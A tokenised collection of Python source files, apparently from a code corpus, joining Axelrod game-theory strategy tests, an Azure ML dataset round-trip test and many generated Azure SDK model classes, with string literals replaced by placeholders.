'<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . responses_test ( [ C , C , C ] , [ C , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ D , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , D , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , C , D ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ D , C , D ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ D , D , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , D , D ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C , C ] , [ D , C , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C , C ] , [ D , D , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C , C ] , [ C , D , D , C ] , [ D ] ) <EOL> class OmegaTFT ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . OmegaTFT <EOL> expected_classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> self . responses_test ( [ C ] * i , [ C ] * i , [ C ] ) <EOL> def test_reset ( self ) : <EOL> player = self . player ( ) <EOL> opponent = axelrod . Defector ( ) <EOL> [ player . play ( opponent ) for _ in range ( <NUM_LIT:10> ) ] <EOL> player . reset ( ) <EOL> self . assertEqual ( player . randomness_counter , <NUM_LIT:0> ) <EOL> self . assertEqual ( player . deadlock_counter , <NUM_LIT:0> ) <EOL> class TestOmegaTFTvsSTFT ( TestHeadsUp ) : <EOL> def test_rounds ( self ) : <EOL> outcomes = zip ( ) <EOL> self . versus_test ( axelrod . OmegaTFT ( ) , axelrod . SuspiciousTitForTat ( ) , <EOL> [ C , D , C , D , C , C , C , C , C ] , <EOL> [ D , C , D , C , D , C , C , C , C ] ) <EOL> class TestOmegaTFTvsAlternator ( TestHeadsUp ) : <EOL> def test_rounds ( self ) : <EOL> self . versus_test ( axelrod . OmegaTFT ( ) , axelrod . Alternator ( ) , <EOL> [ C , C , D , C , D , C , C , C , D , C , C , C , D , D , D , D , D , D ] , <EOL> [ C , D , C , D , C , D , C , D , C , D , C , D , C , D , C , D , C , D ] ) </s>
<s> import unittest <EOL> import pandas as pd <EOL> from pandas . util . testing import assert_frame_equal <EOL> from azure . storage import BlobService <EOL> from azureml import ( <EOL> BytesIO , <EOL> Workspace , <EOL> DataTypeIds , <EOL> ) <EOL> from tests import ( <EOL> id_generator , <EOL> load_test_settings , <EOL> ) <EOL> settings = load_test_settings ( ) <EOL> class RoundTripTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . workspace = Workspace ( <EOL> settings . workspace . id , <EOL> settings . workspace . token , <EOL> settings . workspace . endpoint <EOL> ) <EOL> self . blob = BlobService ( <EOL> settings . storage . account_name , <EOL> settings . storage . account_key <EOL> ) <EOL> def _write_blob_contents ( self , filename , data ) : <EOL> if settings . diagnostics . write_blob_contents : <EOL> with open ( '<STR_LIT>' + filename , '<STR_LIT:wb>' ) as data_file : <EOL> data_file . write ( data ) <EOL> def _write_serialized_frame ( self , filename , data ) : <EOL> if settings . diagnostics . write_serialized_frame : <EOL> with open ( '<STR_LIT>' + filename , '<STR_LIT:wb>' ) as data_file : <EOL> data_file . write ( data ) <EOL> def test_download_blob_then_upload_as_dataframe_then_read_dataset ( self ) : <EOL> def datatypeid_from_header_and_format ( header , format ) : <EOL> if format == '<STR_LIT>' : <EOL> if header == '<STR_LIT>' : <EOL> return DataTypeIds . GenericCSV <EOL> else : <EOL> return DataTypeIds . GenericCSVNoHeader <EOL> elif format == '<STR_LIT>' : <EOL> if header == '<STR_LIT>' : <EOL> return DataTypeIds . GenericTSV <EOL> else : <EOL> return DataTypeIds . GenericTSVNoHeader <EOL> elif format == '<STR_LIT>' : <EOL> return DataTypeIds . PlainText <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> def split_blob_name ( blob_name ) : <EOL> name , format = blob_name . lower ( ) . split ( '<STR_LIT:.>' ) <EOL> if format != '<STR_LIT>' : <EOL> name , header = name . split ( '<STR_LIT:_>' ) <EOL> else : <EOL> header = '<STR_LIT>' <EOL> return name , format , header <EOL> for blob_name in settings . storage . blobs : <EOL> print ( blob_name ) <EOL> name , format , header = split_blob_name ( blob_name ) <EOL> original_data = self . blob . get_blob_to_bytes ( settings . storage . container , blob_name ) <EOL> self . _write_blob_contents ( blob_name , original_data ) <EOL> original_dataframe = pd . read_csv ( <EOL> BytesIO ( original_data ) , <EOL> header = <NUM_LIT:0> if header == '<STR_LIT>' else None , <EOL> sep = '<STR_LIT:U+002C>' if format == '<STR_LIT>' else '<STR_LIT:\t>' if format == '<STR_LIT>' else '<STR_LIT:\n>' , <EOL> encoding = '<STR_LIT>' <EOL> ) <EOL> dataset_name = '<STR_LIT>' + name + id_generator ( ) <EOL> description = '<STR_LIT>' + dataset_name <EOL> data_type_id = datatypeid_from_header_and_format ( header , format ) <EOL> self . workspace . datasets . add_from_dataframe ( <EOL> original_dataframe , <EOL> data_type_id , <EOL> dataset_name , <EOL> description , <EOL> ) <EOL> dataset = self . workspace . datasets [ dataset_name ] <EOL> self . assertIsNotNone ( dataset ) <EOL> result_data = dataset . read_as_binary ( ) <EOL> self . _write_serialized_frame ( blob_name , result_data ) <EOL> result_dataframe = dataset . to_dataframe ( ) <EOL> assert_frame_equal ( original_dataframe , result_dataframe ) <EOL> def test_azureml_example_datasets ( self ) : <EOL> max_size = <NUM_LIT:10> * <NUM_LIT> * <NUM_LIT> <EOL> skip = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> for dataset in self . workspace . example_datasets : <EOL> if not hasattr ( dataset , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' . format ( dataset . name ) ) <EOL> continue <EOL> if dataset . size > max_size : <EOL> print ( '<STR_LIT>' . format ( dataset . name ) ) <EOL> continue <EOL> if dataset . name in skip : <EOL> print ( '<STR_LIT>' . format ( dataset . name ) ) <EOL> continue <EOL> print ( '<STR_LIT>' + dataset . name ) <EOL> frame = dataset . to_dataframe ( ) <EOL> print ( '<STR_LIT>' + dataset . name ) <EOL> dataset_name = '<STR_LIT>' + dataset . name + id_generator ( ) <EOL> description = '<STR_LIT>' + dataset_name <EOL> self . workspace . datasets . add_from_dataframe ( frame , dataset . data_type_id , dataset_name , description ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from msrest . paging import Paged <EOL> class CertificatePaged ( Paged ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT:value>' , '<STR_LIT:type>' : '<STR_LIT>' } <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CertificatePaged , self ) . __init__ ( * args , ** kwargs ) </s>
<s> from msrest . serialization import Model <EOL> class ComputeNodeUser ( Model ) : <EOL> """<STR_LIT>""" <EOL> _validation = { <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True } , <EOL> } <EOL> _attribute_map = { <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:bool>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT:password>' : { '<STR_LIT:key>' : '<STR_LIT:password>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , name , is_admin = None , expiry_time = None , password = None , ssh_public_key = None ) : <EOL> self . name = name <EOL> self . is_admin = is_admin <EOL> self . expiry_time = expiry_time <EOL> self . password = password <EOL> self . ssh_public_key = ssh_public_key </s>
<s> from msrest . serialization import Model <EOL> class JobListPreparationAndReleaseTaskStatusOptions ( Model ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filter = None , select = None , max_results = None , timeout = <NUM_LIT:30> , client_request_id = None , return_client_request_id = None , ocp_date = None ) : <EOL> self . filter = filter <EOL> self . select = select <EOL> self . max_results = max_results <EOL> self . timeout = timeout <EOL> self . client_request_id = client_request_id <EOL> self . return_client_request_id = return_client_request_id <EOL> self . ocp_date = ocp_date </s>
<s> from msrest . serialization import Model <EOL> class JobUpdateOptions ( Model ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , timeout = <NUM_LIT:30> , client_request_id = None , return_client_request_id = None , ocp_date = None , if_match = None , if_none_match = None , if_modified_since = None , if_unmodified_since = None ) : <EOL> self . timeout = timeout <EOL> self . client_request_id = client_request_id <EOL> self . return_client_request_id = return_client_request_id <EOL> self . ocp_date = ocp_date <EOL> self . if_match = if_match <EOL> self . if_none_match = if_none_match <EOL> self . if_modified_since = if_modified_since <EOL> self . if_unmodified_since = if_unmodified_since </s>
<s> from msrest . serialization import Model <EOL> class PoolPatchOptions ( Model ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , timeout = <NUM_LIT:30> , client_request_id = None , return_client_request_id = None , ocp_date = None , if_match = None , if_none_match = None , if_modified_since = None , if_unmodified_since = None ) : <EOL> self . timeout = timeout <EOL> self . client_request_id = client_request_id <EOL> self . return_client_request_id = return_client_request_id <EOL> self . ocp_date = ocp_date <EOL> self . if_match = if_match <EOL> self . if_none_match = if_none_match <EOL> self . if_modified_since = if_modified_since <EOL> self . if_unmodified_since = if_unmodified_since </s>
<s> from msrest . serialization import Model <EOL> class TaskConstraints ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:int>' } , <EOL> } <EOL> def __init__ ( self , max_wall_clock_time = None , retention_time = None , max_task_retry_count = None ) : <EOL> self . max_wall_clock_time = max_wall_clock_time <EOL> self . retention_time = retention_time <EOL> self . max_task_retry_count = max_task_retry_count </s>
<s> VERSION = "<STR_LIT>" </s>
<s> from msrest . serialization import Model <EOL> class KeyCredential ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT:value>' : { '<STR_LIT:key>' : '<STR_LIT:value>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:type>' : { '<STR_LIT:key>' : '<STR_LIT:type>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , start_date = None , end_date = None , value = None , key_id = None , usage = None , type = None ) : <EOL> self . start_date = start_date <EOL> self . end_date = end_date <EOL> self . value = value <EOL> self . key_id = key_id <EOL> self . usage = usage <EOL> self . type = type </s>
<s> from msrest . serialization import Model <EOL> class ProviderOperationsMetadata ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:type>' : { '<STR_LIT:key>' : '<STR_LIT:type>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , id = None , name = None , type = None , display_name = None , resource_types = None , operations = None ) : <EOL> self . id = id <EOL> self . name = name <EOL> self . type = type <EOL> self . display_name = display_name <EOL> self . resource_types = resource_types <EOL> self . operations = operations </s>
<s> from msrest . serialization import Model <EOL> class AddApplicationPackageResult ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:version>' : { '<STR_LIT:key>' : '<STR_LIT:version>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , id = None , version = None , storage_url = None , storage_url_expiry = None ) : <EOL> self . id = id <EOL> self . version = version <EOL> self . storage_url = storage_url <EOL> self . storage_url_expiry = storage_url_expiry </s>
<s> from msrest . serialization import Model <EOL> class CheckNameAvailabilityOutput ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:bool>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:message>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , name_available = None , reason = None , message = None ) : <EOL> self . name_available = name_available <EOL> self . reason = reason <EOL> self . message = message </s>
<s> from . profiles_operations import ProfilesOperations <EOL> from . endpoints_operations import EndpointsOperations <EOL> from . origins_operations import OriginsOperations <EOL> from . custom_domains_operations import CustomDomainsOperations <EOL> from . name_availability_operations import NameAvailabilityOperations <EOL> from . operations_operations import OperationsOperations <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from msrest . serialization import Model <EOL> class DiskInstanceView ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , name = None , statuses = None ) : <EOL> self . name = name <EOL> self . statuses = statuses </s>
<s> from . resource import Resource <EOL> class VirtualMachine ( Resource ) : <EOL> """<STR_LIT>""" <EOL> _validation = { <EOL> '<STR_LIT:id>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT:type>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT:location>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> } <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:type>' : { '<STR_LIT:key>' : '<STR_LIT:type>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:location>' : { '<STR_LIT:key>' : '<STR_LIT:location>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , location , tags = None , plan = None , hardware_profile = None , storage_profile = None , os_profile = None , network_profile = None , diagnostics_profile = None , availability_set = None , provisioning_state = None , license_type = None , vm_id = None ) : <EOL> super ( VirtualMachine , self ) . __init__ ( location = location , tags = tags ) <EOL> self . plan = plan <EOL> self . hardware_profile = hardware_profile <EOL> self . storage_profile = storage_profile <EOL> self . os_profile = os_profile <EOL> self . network_profile = network_profile <EOL> self . diagnostics_profile = diagnostics_profile <EOL> self . availability_set = availability_set <EOL> self . provisioning_state = provisioning_state <EOL> self . instance_view = None <EOL> self . license_type = license_type <EOL> self . vm_id = vm_id <EOL> self . resources = None </s>
<s> from msrest . serialization import Model <EOL> class VirtualMachineScaleSetVMExtensionsSummary ( Model ) : <EOL> """<STR_LIT>""" <EOL> _validation = { <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> } <EOL> _attribute_map = { <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self ) : <EOL> self . name = None <EOL> self . statuses_summary = None </s>
<s> from msrest . serialization import Model <EOL> class AddStorageAccountParameters ( Model ) : <EOL> """<STR_LIT>""" <EOL> _validation = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> } <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , properties ) : <EOL> self . properties = properties </s>
<s> from enum import Enum <EOL> class FileType ( Enum ) : <EOL> assembly = "<STR_LIT>" <EOL> resource = "<STR_LIT>" </s>
<s> from msrest . paging import Paged <EOL> class USqlTableStatisticsPaged ( Paged ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT:value>' , '<STR_LIT:type>' : '<STR_LIT>' } <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( USqlTableStatisticsPaged , self ) . __init__ ( * args , ** kwargs ) </s>
<s> VERSION = "<STR_LIT>" </s>
<s> from msrest . serialization import Model <EOL> class FileStatusProperties ( Model ) : <EOL> """<STR_LIT>""" <EOL> _validation = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } , <EOL> '<STR_LIT:type>' : { '<STR_LIT>' : True } , <EOL> } <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:type>' : { '<STR_LIT:key>' : '<STR_LIT:type>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self ) : <EOL> self . access_time = None <EOL> self . block_size = None <EOL> self . children_num = None <EOL> self . group = None <EOL> self . length = None <EOL> self . modification_time = None <EOL> self . owner = None <EOL> self . path_suffix = None <EOL> self . permission = None <EOL> self . type = None </s>
<s> from msrest . serialization import Model <EOL> class WorkflowRunActionFilter ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:status>' : { '<STR_LIT:key>' : '<STR_LIT:status>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , status = None ) : <EOL> self . status = status </s>
<s> from . sub_resource import SubResource <EOL> class ApplicationGatewayBackendAddressPool ( SubResource ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , id = None , backend_ip_configurations = None , backend_addresses = None , provisioning_state = None , name = None , etag = None ) : <EOL> super ( ApplicationGatewayBackendAddressPool , self ) . __init__ ( id = id ) <EOL> self . backend_ip_configurations = backend_ip_configurations <EOL> self . backend_addresses = backend_addresses <EOL> self . provisioning_state = provisioning_state <EOL> self . name = name <EOL> self . etag = etag </s>
<s> from . sub_resource import SubResource <EOL> class ExpressRouteCircuitPeering ( SubResource ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT:state>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:int>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:int>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:int>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , id = None , peering_type = None , state = None , azure_asn = None , peer_asn = None , primary_peer_address_prefix = None , secondary_peer_address_prefix = None , primary_azure_port = None , secondary_azure_port = None , shared_key = None , vlan_id = None , microsoft_peering_config = None , stats = None , provisioning_state = None , name = None , etag = None ) : <EOL> super ( ExpressRouteCircuitPeering , self ) . __init__ ( id = id ) <EOL> self . peering_type = peering_type <EOL> self . state = state <EOL> self . azure_asn = azure_asn <EOL> self . peer_asn = peer_asn <EOL> self . primary_peer_address_prefix = primary_peer_address_prefix <EOL> self . secondary_peer_address_prefix = secondary_peer_address_prefix <EOL> self . primary_azure_port = primary_azure_port <EOL> self . secondary_azure_port = secondary_azure_port <EOL> self . shared_key = shared_key <EOL> self . vlan_id = vlan_id <EOL> self . microsoft_peering_config = microsoft_peering_config <EOL> self . stats = stats <EOL> self . provisioning_state = provisioning_state <EOL> self . name = name <EOL> self . etag = etag </s>
